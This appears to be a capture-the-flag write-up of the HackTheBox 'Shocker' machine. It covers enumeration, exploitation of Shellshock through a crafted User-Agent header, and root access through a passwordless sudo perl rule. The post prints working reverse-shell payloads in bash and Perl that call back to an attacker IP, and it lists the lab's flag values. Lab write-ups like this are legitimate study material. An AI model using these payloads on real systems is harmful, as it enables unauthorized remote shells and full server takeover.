Post

HackTheBox Shocker

Writeup for HackTheBox Shocker

HackTheBox Shocker

Machine Synopsis

Shocker, while fairly simple overall, demonstrates the severity of the renowned Shellshock exploit, which affected millions of public-facing servers. (Source)

Key exploitation techniques:

  • Shellshock vulnerability (CVE-2014-6271) in CGI script
  • Remote Code Execution (RCE) via HTTP header injection
  • sudo misconfiguration (NOPASSWD for perl)
  • Perl reverse shell for root access

Enumeration

1
2
3
4
5
6
7
8
9
10
11
$ nmap -sC -sV -A 10.10.10.56

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)

The scan identified Apache HTTPD on port 80 and SSH on port 2222.

website

dirsearch was used to find hidden directories on the web server.

1
2
3
4
$ dirsearch -u 10.10.10.56 -w /usr/share/dirb/wordlists/common.txt
...
[20:21:30] 403 -  294B  - /cgi-bin/
...

The /cgi-bin/ directory returned a 403 Forbidden status, indicating its existence but lack of directory listing. dirsearch was then run specifically against /cgi-bin/ with common script extensions.

1
2
3
4
$ dirsearch -u http://10.10.10.56/cgi-bin -w /usr/share/dirb/wordlists/common.txt -f -e sh,cgi,bash
...
[20:29:19] 200 -  119B  - /cgi-bin/user.sh
...

The user.sh script was found. Retrieving its content confirmed it was a CGI script.

1
2
3
4
5
6
$ curl 10.10.10.56/cgi-bin/user.sh
Content-Type: text/plain

Just an uptime test script

 07:31:03 up 30 min,  0 users,  load average: 0.00, 0.02, 0.00

Exploitation

Shellshock RCE (shelly)

Research into “cgi bin exploits” and the machine name “Shocker” pointed to the Shellshock vulnerability (CVE-2014-6271). This vulnerability allows command injection through crafted HTTP headers when a CGI script is executed by a vulnerable version of Bash.

burp

A malicious User-Agent header was crafted to execute a reverse shell payload.

1
2
# Malicious User-Agent header
User-Agent: () { :; }; echo; /bin/bash -c "exec bash -i &>/dev/tcp/<ATTACKER_IP>/<PORT> <&1"

A netcat listener was set up on the attacking machine. The HTTP request to http://10.10.10.56/cgi-bin/user.sh was sent with the crafted User-Agent header (e.g., via curl or Burp Repeater).

1
2
3
4
5
6
7
8
9
10
# On attacker, set up Netcat listener
$ nc -nlvp 1337
listening on [any] 1337 ...

# Reverse shell received
connect to [10.10.14.25] from (UNKNOWN) [10.10.10.56] 44040
bash: no job control in this shell

shelly@Shocker:/usr/lib/cgi-bin$ whoami
shelly

This granted a reverse shell as shelly. The user.txt flag was retrieved.

1
2
3
shelly@Shocker:/usr/lib/cgi-bin$ cd /home/shelly
shelly@Shocker:/home/shelly$ cat user.txt
2ec24e11320026d1e70ff3e16695b233

Privilege Escalation

Sudo perl Abuse (root)

sudo -l was executed to check shelly’s privileges.

1
2
3
4
5
6
7
8
shelly@Shocker:/home/shelly$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl

The output indicated that shelly could run /usr/bin/perl as root without a password. This is a common sudo misconfiguration that can be abused for root access.

A Perl reverse shell payload was crafted to be executed directly via sudo /usr/bin/perl.

1
2
# Perl reverse shell payload
sudo /usr/bin/perl -e 'use Socket;$i="<ATTACKER_IP>";$p=<PORT>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

A netcat listener was set up on the attacking machine.

1
2
3
# On attacker, set up Netcat listener
$ nc -nlvp 6969
listening on [any] 6969 ...

The Perl payload was executed from the shelly shell.

1
2
3
4
5
6
7
shelly@Shocker:/home/shelly$ sudo /usr/bin/perl -e 'use Socket;$i="10.10.14.25";$p=6969;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

# Reverse shell received
connect to [10.10.14.25] from (UNKNOWN) [10.10.10.56] 41834
/bin/sh: 0: can't access tty; job control turned off
# whoami
root

This successfully granted a root shell. The root.txt flag was retrieved.

1
2
3
# cd /root
# cat root.txt
52c2715605d70c7619030560dc1ca467
This post is licensed under CC BY 4.0 by the author.